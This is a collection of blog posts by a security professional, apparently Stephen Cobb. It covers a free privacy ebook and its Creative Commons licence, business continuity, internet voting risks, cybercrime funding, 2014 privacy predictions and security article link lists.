Privacy for Business: eBook from 2002

I published "Privacy for Business: Web sites and email" in 2002. Much of the content about privacy principles in business is still relevant. You can download the book free of charge in electronic form as long as you respect the copyright and license agreement.

(2016 Update: You might also find this more recent article and privacy white paper helpful.)

By clicking the DOWNLOAD button on this page you agree to abide by the licensing agreement below.

License for the electronic edition of Privacy for Business: Web Sites & Email

THE ABOVE NAMED WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS PUBLIC LICENSE ("CCPL" OR "LICENSE"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR OTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS LICENSE OR COPYRIGHT LAW IS PROHIBITED.

BY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO BE BOUND BY THE TERMS OF THIS LICENSE. TO THE EXTENT THIS LICENSE MAY BE CONSIDERED TO BE A CONTRACT, THE LICENSOR GRANTS YOU THE RIGHTS CONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.

1. Definitions

1. "Adaptation" means a work based upon the Work, or upon the Work and other pre-existing works, such as a translation, adaptation, derivative work, arrangement of music or other alterations of a literary or artistic work, or phonogram or performance and includes cinematographic adaptations or any other form in which the Work may be recast, transformed, or adapted including in any form recognizably derived from the original, except that a work that constitutes a Collection will not be considered an Adaptation for the purpose of this License. For the avoidance of doubt, where the Work is a musical work, performance or phonogram, the synchronization of the Work in timed-relation with a moving image ("synching") will be considered an Adaptation for the purpose of this License.
2. "Collection" means a collection of literary or artistic works, such as encyclopedias and anthologies, or performances, phonograms or broadcasts, or other works or subject matter other than works listed in Section 1(f) below, which, by reason of the selection and arrangement of their contents, constitute intellectual creations, in which the Work is included in its entirety in unmodified form along with one or more other contributions, each constituting separate and independent works in themselves, which together are assembled into a collective whole. A work that constitutes a Collection will not be considered an Adaptation (as defined above) for the purposes of this License.
3. "Distribute" means to make available to the public the original and copies of the Work through sale or other transfer of ownership.
4. "Licensor" means the individual, individuals, entity or entities that offer(s) the Work under the terms of this License.
5. "Original Author" means, in the case of a literary or artistic work, the individual, individuals, entity or entities who created the Work or if no individual or entity can be identified, the publisher; and in addition (i) in the case of a performance the actors, singers, musicians, dancers, and other persons who act, sing, deliver, declaim, play in, interpret or otherwise perform literary or artistic works or expressions of folklore; (ii) in the case of a phonogram the producer being the person or legal entity who first fixes the sounds of a performance or other sounds; and, (iii) in the case of broadcasts, the organization that transmits the broadcast.
6. "Work" means the literary and/or artistic work offered under the terms of this License including without limitation any production in the literary, scientific and artistic domain, whatever may be the mode or form of its expression including digital form, such as a book, pamphlet and other writing; a lecture, address, sermon or other work of the same nature; a dramatic or dramatico-musical work; a choreographic work or entertainment in dumb show; a musical composition with or without words; a cinematographic work to which are assimilated works expressed by a process analogous to cinematography; a work of drawing, painting, architecture, sculpture, engraving or lithography; a photographic work to which are assimilated works expressed by a process analogous to photography; a work of applied art; an illustration, map, plan, sketch or three-dimensional work relative to geography, topography, architecture or science; a performance; a broadcast; a phonogram; a compilation of data to the extent it is protected as a copyrightable work; or a work performed by a variety or circus performer to the extent it is not otherwise considered a literary or artistic work.
7. "You" means an individual or entity exercising rights under this License who has not previously violated the terms of this License with respect to the Work, or who has received express permission from the Licensor to exercise rights under this License despite a previous violation.
8. "Publicly Perform" means to perform public recitations of the Work and to communicate to the public those public recitations, by any means or process, including by wire or wireless means or public digital performances; to make available to the public Works in such a way that members of the public may access these Works from a place and at a place individually chosen by them; to perform the Work to the public by any means or process and the communication to the public of the performances of the Work, including by public digital performance; to broadcast and rebroadcast the Work by any means including signs, sounds or images.
9. "Reproduce" means to make copies of the Work by any means including without limitation by sound or visual recordings and the right of fixation and reproducing fixations of the Work, including storage of a protected performance or phonogram in digital form or other electronic medium.

2. Fair Dealing Rights. Nothing in this License is intended to reduce, limit, or restrict any uses free from copyright or rights arising from limitations or exceptions that are provided for in connection with the copyright protection under copyright law or other applicable laws.

3. License Grant. Subject to the terms and conditions of this License, Licensor hereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for the duration of the applicable copyright) license to exercise the rights in the Work as stated below:

1. to Reproduce the Work, to incorporate the Work into one or more Collections, and to Reproduce the Work as incorporated in the Collections; and,
2. to Distribute and Publicly Perform the Work including as incorporated in Collections.

The above rights may be exercised in all media and formats whether now known or hereafter devised. The above rights include the right to make such modifications as are technically necessary to exercise the rights in other media and formats, but otherwise you have no rights to make Adaptations. Subject to 8(f), all rights not expressly granted by Licensor are hereby reserved, including but not limited to the rights set forth in Section 4(d).

4. Restrictions. The license granted in Section 3 above is expressly made subject to and limited by the following restrictions:

1. You may Distribute or Publicly Perform the Work only under the terms of this License. You must include a copy of, or the Uniform Resource Identifier (URI) for, this License with every copy of the Work You Distribute or Publicly Perform. You may not offer or impose any terms on the Work that restrict the terms of this License or the ability of the recipient of the Work to exercise the rights granted to that recipient under the terms of the License. You may not sublicense the Work. You must keep intact all notices that refer to this License and to the disclaimer of warranties with every copy of the Work You Distribute or Publicly Perform. When You Distribute or Publicly Perform the Work, You may not impose any effective technological measures on the Work that restrict the ability of a recipient of the Work from You to exercise the rights granted to that recipient under the terms of the License. This Section 4(a) applies to the Work as incorporated in a Collection, but this does not require the Collection apart from the Work itself to be made subject to the terms of this License. If You create a Collection, upon notice from any Licensor You must, to the extent practicable, remove from the Collection any credit as required by Section 4(c), as requested.
2. You may not exercise any of the rights granted to You in Section 3 above in any manner that is primarily intended for or directed toward commercial advantage or private monetary compensation. The exchange of the Work for other copyrighted works by means of digital file-sharing or otherwise shall not be considered to be intended for or directed toward commercial advantage or private monetary compensation, provided there is no payment of any monetary compensation in connection with the exchange of copyrighted works.
3. If You Distribute, or Publicly Perform the Work or Collections, You must, unless a request has been made pursuant to Section 4(a), keep intact all copyright notices for the Work and provide, reasonable to the medium or means You are utilizing: (i) the name of the Original Author (or pseudonym, if applicable) if supplied, and/or if the Original Author and/or Licensor designate another party or parties (e.g., a sponsor institute, publishing entity, journal) for attribution ("Attribution Parties") in Licensor's copyright notice, terms of service or by other reasonable means, the name of such party or parties; (ii) the title of the Work if supplied; (iii) to the extent reasonably practicable, the URI, if any, that Licensor specifies to be associated with the Work, unless such URI does not refer to the copyright notice or licensing information for the Work. The credit required by this Section 4(c) may be implemented in any reasonable manner; provided, however, that in the case of a Collection, at a minimum such credit will appear, if a credit for all contributing authors of Collection appears, then as part of these credits and in a manner at least as prominent as the credits for the other contributing authors. For the avoidance of doubt, You may only use the credit required by this Section for the purpose of attribution in the manner set out above and, by exercising Your rights under this License, You may not implicitly or explicitly assert or imply any connection with, sponsorship or endorsement by the Original Author, Licensor and/or Attribution Parties, as appropriate, of You or Your use of the Work, without the separate, express prior written permission of the Original Author, Licensor and/or Attribution Parties.
4. For the avoidance of doubt:
   1. Non-waivable Compulsory License Schemes. In those jurisdictions in which the right to collect royalties through any statutory or compulsory licensing scheme cannot be waived, the Licensor reserves the exclusive right to collect such royalties for any exercise by You of the rights granted under this License;
   2. Waivable Compulsory License Schemes. In those jurisdictions in which the right to collect royalties through any statutory or compulsory licensing scheme can be waived, the Licensor reserves the exclusive right to collect such royalties for any exercise by You of the rights granted under this License if Your exercise of such rights is for a purpose or use which is otherwise than noncommercial as permitted under Section 4(b) and otherwise waives the right to collect royalties through any statutory or compulsory licensing scheme; and,
   3. Voluntary License Schemes. The Licensor reserves the right to collect royalties, whether individually or, in the event that the Licensor is a member of a collecting society that administers voluntary licensing schemes, via that society, from any exercise by You of the rights granted under this License that is for a purpose or use which is otherwise than noncommercial as permitted under Section 4(b).
5. Except as otherwise agreed in writing by the Licensor or as may be otherwise permitted by applicable law, if You Reproduce, Distribute or Publicly Perform the Work either by itself or as part of any Collections, You must not distort, mutilate, modify or take other derogatory action in relation to the Work which would be prejudicial to the Original Author's honor or reputation.

5. Representations, Warranties and Disclaimer

UNLESS OTHERWISE MUTUALLY AGREED BY THE PARTIES IN WRITING, LICENSOR OFFERS THE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING THE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT LIMITATION, WARRANTIES OF TITLE, MERCHANTIBILITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT, OR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE OF ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY TO YOU.

6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW, IN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT OF THIS LICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

7. Termination

1. This License and the rights granted hereunder will terminate automatically upon any breach by You of the terms of this License. Individuals or entities who have received Collections from You under this License, however, will not have their licenses terminated provided such individuals or entities remain in full compliance with those licenses. Sections 1, 2, 5, 6, 7, and 8 will survive any termination of this License.
2. Subject to the above terms and conditions, the license granted here is perpetual (for the duration of the applicable copyright in the Work). Notwithstanding the above, Licensor reserves the right to release the Work under different license terms or to stop distributing the Work at any time; provided, however that any such election will not serve to withdraw this License (or any other license that has been, or is required to be, granted under the terms of this License), and this License will continue in full force and effect unless terminated as stated above.

8. Miscellaneous

1. Each time You Distribute or Publicly Perform the Work or a Collection, the Licensor offers to the recipient a license to the Work on the same terms and conditions as the license granted to You under this License.
2. If any provision of this License is invalid or unenforceable under applicable law, it shall not affect the validity or enforceability of the remainder of the terms of this License, and without further action by the parties to this agreement, such provision shall be reformed to the minimum extent necessary to make such provision valid and enforceable.
3. No term or provision of this License shall be deemed waived and no breach consented to unless such waiver or consent shall be in writing and signed by the party to be charged with such waiver or consent.
4. This License constitutes the entire agreement between the parties with respect to the Work licensed here. There are no understandings, agreements or representations with respect to the Work not specified here. Licensor shall not be bound by any additional provisions that may appear in any communication from You. This License may not be modified without the mutual written agreement of the Licensor and You.
5. The rights granted under, and the subject matter referenced, in this License were drafted utilizing the terminology of the Berne Convention for the Protection of Literary and Artistic Works (as amended on September 28, 1979), the Rome Convention of 1961, the WIPO Copyright Treaty of 1996, the WIPO Performances and Phonograms Treaty of 1996 and the Universal Copyright Convention (as revised on July 24, 1971). These rights and subject matter take effect in the relevant jurisdiction in which the License terms are sought to be enforced according to the corresponding provisions of the implementation of those treaty provisions in the applicable national law. If the standard suite of rights granted under applicable copyright law includes additional rights not granted under this License, such additional rights are deemed to be included in the License; this License is not intended to restrict the license of any rights under applicable law.

Business Continuity Management: Sounds boring yet saves lives, companies, butts

Lately, I've been revisiting an area of information security into which I have dived deeply on several occasions over the years: Disaster Recovery, which is pretty much the same as Business Continuity Management or BCM, which includes Business Continuity Planning (BCP). Along the way I have assembled a list of high quality BCM resources and articles that folks might find useful (and available for free in most cases). You will find the list at the end of this article. Here's a scene-setting quote from one of the articles:

Disasters can strike at any time – often with little or no warning – and the effects can be devastating. The cost in human lives and property damage is what makes the evening news because of the powerful tug of human interest. Much less coverage, however, is given to the disruption, struggle and survivability of business operations. A study fielded by the Institute for Business and Home Safety revealed that 25 percent of all companies that close due to disasters – hurricanes, power failures, acts of terror and others – never reopen. (Disaster Preparedness Planning: Maintaining Business Continuity During Crisis, Disruption and Recovery)

Internet voting security: a scary tweet that reached 227,391 (even before Heartbleed)

Last month I tweeted a picture of some computer code that was part of an Internet voting system. That picture was re-tweeted so many times it reached more than 220,000 Twitter users. So, that had to be some pretty amazing code, right? Yes, as in amazingly frightening. Take a look, and then read on for a short explanation, and also a long one if you have the time.

A very clever computer scientist, Joe Kiniry, has been concerned about the security of Internet voting applications for some time. Joe is a former Technical University of Denmark professor, now Principal Investigator at Galois. In his research Joe noted this section of code in a program that was actually used for national elections in a European country.

The coder(s) have included a comment reminding themselves that security checks still need to be coded. My tweet suggested that this slide nicely illustrated the question of “what could possibly go wrong?” when it comes to Internet voting. Of course, the best answer to that question is: So much could go wrong you simply cannot use the Internet to elect public officials in a fair, honest, secret ballot!

A call to action we ignore at our peril

You don't have to watch all of this video to know that Josh Corman has clearly articulated the massive scope of the IT security challenges we face today, and he has done it using language that even a CEO or a Middle School teacher can understand. I think the whole thing is worth watching, but if you cut to minute 15 you get to the crux of the matter:

"Our dependence on technology is growing faster than our ability to secure it....Issues of public safety and public concern require public discussion and public solutions...We are going to be the ambassadors of technical literacy."

My committment to my ambassadorial duties is my New Year resolution. Let the educational outreach begin.

The Privacy Meter Redux

My prediction that data privacy is going to be a hot topic in 2014 was not surprising, but I am surprised at how many interview requests I've had so far, and we're barely halfway through January. Yesterday I found myself filling a last minute request to appear on a local TV channel. So I dusted off the trusty privacy meter.

I created this learning device in 2001 and it went into my privacy book that came out in 2002. And it is just a visual device, an image to use as a tool when discussing privacy. (Feel free to use it, you have my permission, it is released to the public domain.)

The idea is to ask people to self-assess where they fit on a scale from closed book to open book. They do not need to reveal their "privacy reading" but they do need to think about whether or not it is fair to impose their position on others.

In other words, there is no correct reading, but plenty of scope to use the meter as a basis for discussion. For example, suppose you are an open book. Is it fair to make others become open book about their personal data if they prefer to be more of a closed book? On the other hand, if you think you are a closed book, are you prepared to provide information about yourself in order to authenticate your identity and establish trust?

Why there is so much cyber crime: #1 It's our spending priorities

With the number of potential victims of the Target data breach now topping 100 million, a lot of people who have never really given much thought to cyber crimes are asking: Why? How is it that criminals can commit computer crime on this scale with apparent impunity? After all, we pay taxes to be protected from the kind of scum that perpetrate crimes like this.

There are a number of answers to the question "why is there so much cyber crime?" But for me, the first answer on the list, the one that has been ignored by most of the talking heads who've been hashing over the scant details of the Target breach on TV, looks like this:

Despite all the hot air from politicians over the last 15 years, repeatedly pledging to do something about computer crime, the U.S. has failed to make fighting cyber crime a priority. I think these relative spending numbers make that clear. I would love to hear anyone argue that we are spending enough money to track down and prosecute cyber criminals right now.

An academic study published in 2012 put the total U.S. law enforcement spend on the fight against cyber crime at $200 million per year. I decided to be generous in my chart and rounded it up to $250 million.

The figure of $15 billion is often cited as the annual cost of the war on drugs, so apparently that is 60X more important than cyber crime. We know from the Snowden revelations that spy agencies spend over $52 billion per year, so apparently we think that what they do is 200X more important than fighting cyber crime.

How about we shave $0.5 billion off the intelligence agency budgets and spend it on bringing cyber criminals to justice? That's a 3X increase over what we spend right now. That might well be enough to put a significant number of perpetrators behind bars, including the ones we could afford to bring to the U.S. from other countries, thereby tipping the risk/reward equation against the bad guys and in the favor of honest citizens.

I'm writing to my representatives in Washington to tell them what I think our priorities should be. I'm sending them this chart. If you agree, I invite you to send it to the folks who are supposed to be representing you.

My #4 personal privacy and security prediction for 2014: A BIG year for good/bad news

As we enter 2014 it is clear that two events in 2013 have rocketed data privacy and information security to the highest level of public awareness that these the complex topics have ever attained. I'm talking about the Snowden revelations and the Target breach.

For me, this surge in public awareness of the importance of data privacy and cybersecurity is both exciting and frightening.Why? Because 2014 is obviously going to be a big year for those of us who work in these closely intertwined fields, a year when more people than ever before will be concerned about securing their data, yet more distrustful than ever of the folks who are trying to help them do that (among whom I count myself).

Consider that I have spent the better part of 20 years writing and speaking about these issues, starting with computer security, then network security, system security, information assurance, data privacy, and now "cybersecurity." You could say that I have wanted nothing more than to make the world aware of the importance of these things, for the simple reason that, without such awareness, the true potential of digital technology will never be realized.

Let me put it a different way: Are you wondering where the flying cars are? Are you disappointed that in 2014 we don't yet have them, or transoceanic high speed rail service, or the handheld medical scanner that can diagnose the top 100 medical conditions in a single swipe? I believe we would have achieved these or similar technological marvels by now if it were not for the massive distraction of information insecurity.

I don't want to wander off into too many examples, but consider one: Towards the end of the last century email was poised to become a universal tool for managing transactions cheaply and easily. Then came the spam-plosion, a massive surge in unsolicited commercial email that rose to become 80% or more of all email and had Internet service providers (ISP's) buying new servers once a fortnight just to maintain legitimate service. Combine that with the inability of the major email providers to agree on improvements to email protocols, and you have the death of transactional email that is still hampering large slices of our economy, like banking, healthcare, government, and retail.

So the good news / bad news in 2014 goes like this:

• Are most consumers now aware that cybercrime is a serious problem? Yes. Can a young working mother buy diapers at a discount store without fear of losing her identity, and all the money in her back account, despite the billions that have been spent on cybersecurity? No, because we have grossly under-funded the vital work of catching the cyber-scum at the root of that fear. 
• Are most companies now aware that cybercrime is a serious problem? Yes. Can a company develop new products without fear of them leaking from their computers to a nation state agency and/or its clients? No, because it is possible that every piece of hardware and software you buy to build your dreams has already been hacked, back-doored, or otherwise compromised, thanks in part to your own tax dollars at work (see this article or the pictures here if you are not clear on this).

Now this next bit may sound self-serving, but I assure you it is not. I am employed by a company that sells security software, some of which requires root access in order to protect systems. However, the company doesn't pay me to sell this software, they pay me to think about security and privacy and explain of much of this stuff as I can to as many people as possible. The company has, in my considered opinion as a 20-year industry veteran, the very highest ethical standards. All of the people that I work with, in this company and in many of our leading competitors, are dedicated to eliminating the scourge of malware and other threats perpetrated by the world's cyber-scum. A fair number of us have been at this for 10 or 20 years or more. Yet today, in 2014, we are being asked: Are you helping the government spy on its people?"

The answer is no, but although part of me feels hurt and even insulted by this line of questioning, objectively-speaking I cannot object, particularly when I see these pages from a catalog of hardware and software crippled by the NSA, in other words, produced by my own government. I am sure that the people who developed these things thought they were doing the right thing, and only intended them to be used for righteous purposes like defending our nation. But the people in charge clearly failed to consider what would happen to the nation when the world found out about them.

I bet you a box of donuts that in 2014 at least one person will ask me where they can get a USB cable that is certified uncompromised. The fact that I don't have a good answer really bothers me. More people than ever before are going to be asking security professionals for help in creating secure systems, even as those professionals try to deal with NSA-fueled doubts about the very building blocks of such systems. One way or another, or both, it's going to be a BIG year.

My #3 personal privacy and security prediction for 2014: Cyber won't be icky any more

I predict, and sincerely hope, that in 2014 most of us information security professionals will stop apologizing whenever we use the letters c-y-b-e-r like in cyber crime, or cyber security. I also predict/hope we will stop putting "cyber" in ironic air quotes or pronouncing it in a snide tone that implies we are above using words that the world has thrust upon us.

Let's face it, computers, networks, information systems, endpoints, digital devices, tablets, smartphones, Internet-enabled-DVD-players, Bluetooth insulin pumps, they are all cyber. 

So computer security, network security, information system security, endpoint security, digital device security, tablet security, smartphone security, Internet-enabled-DVD-player security, Bluetooth insulin pump security, they are all cyber security, or cyber-security, or cybersecurity.

In 2014 we are going to have to answer a lot of questions about the security of digital information. In our answers we can call it digital security, or refer to "the security of all things digital", but it is also okay to say cyber security. And referring to the bad guys as cyber criminals is a lot easier than saying "those who would subvert any or all things digital with criminal intent."

In 2013 there were times when I said things like cyber scammers and cyber scum well as cyber criminals. I'm not going to apologize for that because I think the general public gets what cyber means. It means all things digital, it means my data and the devices and systems that process and store them. Cyber security is about protecting that stuff. Let's save our erudition and expository powers for the many other, more complex and nuanced concepts that will need to be explained in 2014, like why public key encryption needs private keys, and what pseudo random number generators have done for us lately.

My #2 personal privacy and security prediction for 2014: NSA-GCHQ-NRO will dominate

Here is another of the privacy and security predictions I am making for 2014. This is in addition to the ones I contributed to We Live Security where I had the honor of presenting predictions from my fellow researchers at ESET. Note that the following are my personal opinions, which may differ from those of my employer (although my employer has some pretty cool opinions).

The #1 privacy and security story in 2014 will be the NSA

Snowden-sourced papers will continue to leak, further revealing just how thoroughly America's National Security Agency has pursued the goal set by its leadership: make sure no piece of information about any person anywhere is beyond reach. While the NSA has dominated much of the privacy and security news in 2013, the story may evolve into a triple play in 2014, with GCHQ on one side, NRO on the other.

The National Reconnaissance Office has already made a big play for attention with its latest spy satellite, NROL-39, launched in early December sporting a logo that many pundits will claim says it all: NOTHING IS BEYOND OUR REACH.

While NSA and GCHQ are initials known to millions around the world, the NRO has lurked in the shadows, despite having a budget about the same size as the NSA; that's $10.3 billion and $10.8 billion, for the NRO and NSA respectively for 2013, according to the Washington Post.

Note that in the mid-1990s the budgets were $6 billion and $3.6 billion, with NRO spending far-outpacing the NSA and CIA.

Expect someone to put more detailed spending numbers together as the work of these agencies comes under increased scrutiny in 2014. For example, all three have a history of using military employees who are paid out of their respective armed forces budgets. So the total U.S. spend on surveillance and code-breaking activities may be more than has yet been reported.

If the NROL-39 logo is any indication, very little of the NRO budget has gone into public relations and incident response planning. It is hard to imagine more disastrous imagery and sloganeering for a spy satellite launched post-Snowden. No wonder that within a few days we heard loud and clear from the world's technology giants demanding global surveillance reform. (A topic I discussed recently over on Tech Republic.)

My #1 personal privacy and security prediction for 2014: Antivirus will be slandered, again

Here is one of the privacy and security predictions I am making for 2014. This is in addition to the ones I contributed to We Live Security where I had the honor of presenting predictions from my fellow researchers at ESET. Note that the following are my personal opinions, which may differ from those of my employer (although my employer has some pretty cool opinions).

The media will repeat a massive lie about antivirus technology

I predict that in 2014 every major newspaper and magazine will perpetuate, to the detriment of data security and human understanding, the grossly erroneous notion that "for an antivirus firm to spot malware, it first needs to have seen the malware, recognized that it's malicious code, and written a corresponding virus signature for its products."

I predict that, although this assertion is simply not true, and has not been true for many years, that fact will not deter people from repeating it, over and over. This is a bit like Car and Driver or Consumer Reports saying that cars cannot be started without first engaging the crank handle.

True, there was a time, long ago, when crank handles were routinely used to start cars, just as some antivirus programs were, in the distant past, based solely on signatures derived from known bad code. I've got a free t-shirt and more for the first mainstream journalist who breaks rank from the ill-informed herd and points out that any AV app worthy of the name today uses a lot more than signature matching to protect systems from malicious code. 

(With huge hat tip to the guys in Norway who posted that YouTube video of a hand-crank start: they are braver men than me; I've seen how much pain a crank handle can cause.)

Free professional security advice for Palestinian hackers

First of all, welcome. I am glad you found this page. Please don’t hack it.

Who am I? I am a computer security professional with over 20 years experience, just one of many people in the computer security world who have great sympathy for the Palestinian people. We agree with you that the Palestinian people deserve to live in peace. We let our politicians know what we think. We use social media to spread news and awareness of the injustices suffered by the Palestinian people at the hands of Western governments and their allies in the region (for example, see my pins of infographics about the Occupation).

As computer security professionals, we also work hard to protect the privacy and cybersecurity of hundreds millions of individuals around the world. Some of those people are Palestinians. For example, I work at ESET, a company which protects the computers and smartphones of many millions of people in more than 180 different countries. I’m guessing some of them are Palestinian sympathizers.

More information security articles from Stephen and Michael

Here's an update on the information security stuff we've been writing. Three articles from SearchSecurity by Mike and a link to my archive on We Live Security.

• Expert Michael Cobb discusses why known Java security vulnerabilities are on so many endpoints and how to contain them -- without updating Java. 
• Identifying and locking down known Java security vulnerabilities
   
• The recent Ruby on Rails security vulnerabilities can be patched. Expert Michael Cobb discusses the fallout and offers help with remediation planning. 
• Remediation planning for Ruby on Rails security vulnerabilities

• Is Microsoft's Bing search engine more susceptible to search engine poisoning than Google? Expert Michael Cobb discusses Bing security.  
• Bing security: Is search engine poisoning a problem for Bing users? 

• From NIST's Cyber Security Framework to NSA's impact on Wall Street. 
• Stephen Cobb's articles on WeLiveSecurity.com

Criminal hackers force down volunteer site serving hemochromatosis help

Just a quick note to say that the website I created at CelticCurse.org is offline at the moment due to compromise by illegal access. It looks like criminal hackers forced their way into the server that hosts the site and installed their own code to launch DDoS attacks.

If you are not familiar with the site, it is an entirely volunteer project that serve up information and resources for people with hemochromatosis, a potentially fatal genetic disorder that affects millions around the world. Due to low awareness in the medical community hemochromatosis is widely under-diagnosed and often ill-treated, leading to a lot of needless pain and suffering.

I am working to restore the site, but in the meantime people who need more information about hemochromatosis can visit:

• The Facebook Hemochromatosis page (please Like the page, it will help spread the word).

If you want THE book on hemochromatosis, we highly recommend:

More security articles from Michael Cobb, CISSP-ISSAP

• Heading Off Advanced Social Engineering Attacks

  March 18, 2013
  An inside look at how social engineering attacks are developed -- and how you can protect your organization

• What Antivirus Shortcomings Mean For SMBs

  January 23, 2013
  Accepting the risks that come with relying solely on AV not only puts data at risk, but also could kill future earning potential

• Six Security Services Every Small Business Must Have

  January 10, 2013
  A look at managed services for small and midsize businesses, and how to choose the ones that work for your organization

• Five Security Tools Every Small Business Must Have

  January 08, 2013
  Small businesses often are short on security skills, staffing and budget. Here are five tools that can help

• Measuring Risk: A Security Pro's Guide

  August 07, 2012
  A look at the tools for evaluating security risks -- and some tips for putting the resulting data into business context

• Evaluating And Choosing Threat Intelligence Tools

  July 15, 2012
  So you want to collect and analyze your own threat data. What tools do you need? Here are some tips for finding the right ones

• When To Outsource Security -- And When Not To

  June 04, 2012
  New Dark Reading report offers insights on the advantages and pitfalls of bringing in a third party to help with security

• How Did They Get In? A Guide To Tracking Down The Source Of An APT

  April 18, 2012
  Advanced persistent threats can be complex and sophisticated. Here are some tips on how to analyze them

• How To Detect And Defend Against Advanced Persistent Threats

More Cobb security resources

This is just a quick post to update links to Cobb-sourced information security resources. Here's a round of articles by Mike Cobb, CISSP:

Best Practices: 6 Security Services Every Small Business Must Have

Best Practices: 5 Security Tools Every Small Business Must Have
Strategy: Evaluating and Choosing Threat Intelligence Tools
Strategy: Measuring Risk: A Security Pro's Guide
Strategy: Finding the Right Security Outsourcing Balance
Strategy: Tracking the Source of APTs
Strategy: Detecting and Defending Against Advanced Persistent Threats
Strategy: Stop Illicit Data Dumps
Biometrics for the Rest of Us
Strategy: Biometrics

And here is a handy link for the articles Stephen Cobb posts on the ESET blog:

Stephen Cobb on the ESET blog 

More Cobbs on Information Security: Selected articles by Stephen & Michael

As you may know from my previous post, my first book on computer security was published in 1992. That led to an invitation to speak at the 1994 Virus Bulletin conference, and in 1996 I was one of the first people to pass the CISSP exam. A few years later, my brother Michael Cobb, became an MCDBA and then a CISSP, and later a CISSP-ISSAP.

Michael, who also writes as Mike Cobb, is also CLAS (stands for the UK's CESG Listed Advisor Scheme--CLAS consultants play a key role in providing Information Assurance advice to government departments and other organisations that provide services for the government.)

Over the year's Mike and I have written and spoken a lot about security. W've taught a lot of security classes, and delivered a host of security and privacy themed seminars, podcasts, and webcasts. Right now I am working up the strength to create a library of links to as many of these as I can find online. But in the meantime, here are 5 recent items from each of us.

Michael's List

Mike/Michael Cobb writes for a variety of publications, including SearchSecurity and Dark Reading. Here are 5 recent articles:

1. Measuring Risk: A Security Pro's Guide
2. Evaluating and Choosing Threat Intelligence Tools
3. When To Outsource Security - And When Not To
4. How Did They Get In? A Guide To Tracking Down The Source Of An APT 
5. How To Detect And Defend Against Advanced Persistent Threats 

Stephen's List

I write for the ESET Threat Blog as well as my own blog and SC Magazine's Cybercrime Corner. Here are 4 widely read items and an index of my posts from the ESET blog:

1. Data security and digital privacy on the road, what travelers should know 
2. FBI Ransomware: Reveton seeks MoneyPak payment in the name of the law
3. Malware RATs can steal your data and your money, your privacy too
4. Privacy and Security in the Consumer Cloud: The not so fine print
5. Library of Stephen Cobb's articles on the ESET Threat Blog 

I hope you find this material helpful.

Cobb's PC and LAN Security: 20th anniversary of publication (available as a free download!)

The Stephen Cobb Complete Book of PC and LAN Security first appeared in print in 1992, an amazing 20 years ago. In celebration of this anniversary, I'm publishing a PDF copy of the most recent version of the book, freely downloadable under a Creative Commons license. The large file size of this 700 page tome led me to publish it in three easily digestible parts: Part One; Part Two; and Part Three. (Yes, my organizational skills are legendary.)

Despite the title, which was imposed by the publisher, the volume that appeared 20 years ago was by no means a "complete book" on the subject; nor is it now a contemporary guide. However, you can still find it on Amazon, even though Amazon.com did not exist when the first version was published. The images immediately on the right are the current Amazon listings of the three versions (which I will explain shortly).

If you are inclined to take this particular trip down computer security's memory lane, I suggest you download the free electronic version rather than purchase on Amazon. On that trip you will find a few items of note, such as this:

The goal of personal computer security is to protect and foster the increased creativity and productivity made possible by a technology that has so far flourished with a minimum of controls, but which finds itself increasingly threatened by the very openness that led to its early success. To achieve this goal, you must step from an age of trusting innocence into a new era of realism and responsibility, without lurching into paranoia and repression.

I'd say that's a decent piece of prognostication for 1992. It's one of the reasons I have kept the book available all these years, a mix of nostalgia and history. At some point in the future it might be interesting to see what computer security looked like in the late 20th century.

Three Versions and a Free Version

I made a lot of changes when I turned that 1992 volume into The NCSA Guide to PC and LAN Security--a 700 page paperback that was published in 1995--but that edition is also very outdated these days. Around 12 years ago I obtained the copyright to these works and, through an arrangement with the Authors Guild, got it reprinted as Cobb's Guide to PC and LAN Security. This was done largely for sentimental reasons and the copies are only printed on demand. However, in that process I obtained a high resolution scan of the entire book. I then converted this to text using Adobe OCR software. The result is what I have put online. (Warning: you may encounter OCR errors and artifacts; no claims are made as to accuracy of the information in this document; use at your own risk and discretion).

LEGAL STUFF: THIS FREE ELECTRONIC EDITION IS LICENSED BY THE AUTHOR FOR USE UNDER CREATIVE COMMONS, ATTRIBUTION, NONCOMMERCIAL, NO DERIVATES. 

Computer Security Prognosis and Predictions 

I plan to post more thoughts on computer security "then and now" but for now I leave you with another quote from the 1992 Stephen Cobb Complete Book of PC and LAN Security:

The most cost-effective long-term approach to personal computer security is the promotion of mature and responsible attitudes among users. Lasting security will not be achieved by technology, nor by constraints on those who use it. True security can only be achieved through the willing compliance of users with universally accepted principles of behavior. Such compliance will increase as society as a whole becomes increasingly computer literate, and users understand the personal value of the technology they use.

Stuxnet, Flame, Information Security and Privacy Blog Posts

I thought I would update the blog for June by listing some of my recent articles and posts from elsewhere, mainly the ESET Threat Blog, unless stated otherwise.

• Stuxnet, Flamer, Flame, Whatever Name: There’s just no good malware
• The negative impact on GDP of state-sponsored malware like Stuxnet and Flame
• Data security and digital privacy on the road, what travelers should know
• Cybercrime and the small business: Basic defensive measures
• Malware RATs can steal your data and your money, your privacy too
• Privacy and Security in the Consumer Cloud: The not so fine print
• Cyber crime as a market - Information security experts often talk about the costs of cybercrime to businesses, but a new report from Russia quantifies how much criminals make in the "cybercrime market." (SC Magazine)
